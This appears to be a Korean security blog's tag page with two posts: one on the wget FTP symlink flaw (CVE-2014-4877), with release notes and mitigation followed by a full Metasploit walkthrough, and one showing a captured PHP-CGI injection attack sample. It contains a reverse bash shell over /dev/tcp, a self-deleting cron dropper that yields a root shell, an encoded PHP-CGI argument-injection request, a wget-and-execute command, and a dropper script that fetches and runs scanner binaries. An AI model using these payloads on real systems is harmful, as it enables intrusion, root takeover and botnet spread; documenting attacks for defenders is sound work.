'wget'에 해당되는 글 2건

  1. 2014.10.31 Wget FTP Symlink Attack Vulnerability
  2. 2014.09.04 쉘코드 웹공격 사례 샘플
2014. 10. 31. 18:03

Wget FTP Symlink Attack Vulnerability

728x90

http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html


[Bug-wget] GNU wget 1.16 released

It is available for download here:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz

and the GPG detached signatures using the key E163E1EA:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig

To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:

http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz

* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.


"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"



Exploitation

 

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

 

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

 

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

 

cat>cronshell <<EOD

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell

EOD

 

Now we start up msfconsole and configure a shell listener:

 

msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST 192.168.0.4

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444

 

Finally we switch to the wget module itself:

 

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m ftp://192.168.0.4:21/

[*] Server started.

 

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

 

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> RETR cronshell

[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

 

 

msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...

 

id

uid=0(root) gid=0(root) groups=0(root),1001(rvm)


Trackback 0 Comment 0
2014. 9. 4. 10:03

쉘코드 웹공격 사례 샘플

728x90

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0


<?php system("wget http://221.132.xxx.26/sh -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");


/tmp/sh

#!/bin/bash

dontrun=""

arch=`uname -m`

cd /dev/shm

function runPnscan()

{


cd /dev/shm

chmod +x pnscan php

bash run &


}


function isPnscanOn()

{

        pid=`pidof pnscan`

        if [ "$pid" == "" ];then


                retval=0

        else

                retval=1

        fi

        echo "$retval"

}

        cd /dev/shm

        if [ ! -f pnscan ];then

        case "$arch" in

                "x86_64")

                wget -q http://bont.xxx/ar/64.tgz -O 64.tgz

                tar xvzf 64.tgz

                rm -rf 64.tgz

                ;;

                *)

                wget -q http://bont.xxx/ar/86.tgz -O 86.tgz

                tar xvzf 86.tgz

                rm -rf 86.tgz

                ;;

        esac

        fi



if [ $(isPnscanOn) == 1 ];then

#        echo "Running"

        exit

else

        echo "Not Running"

        if [ "$dontrun" != "1" ];then

                $(runPnscan)

        fi

fi

rm -rf /dev/shm/run

rm -rf /dev/shm/pnscan



Trackback 0 Comment 0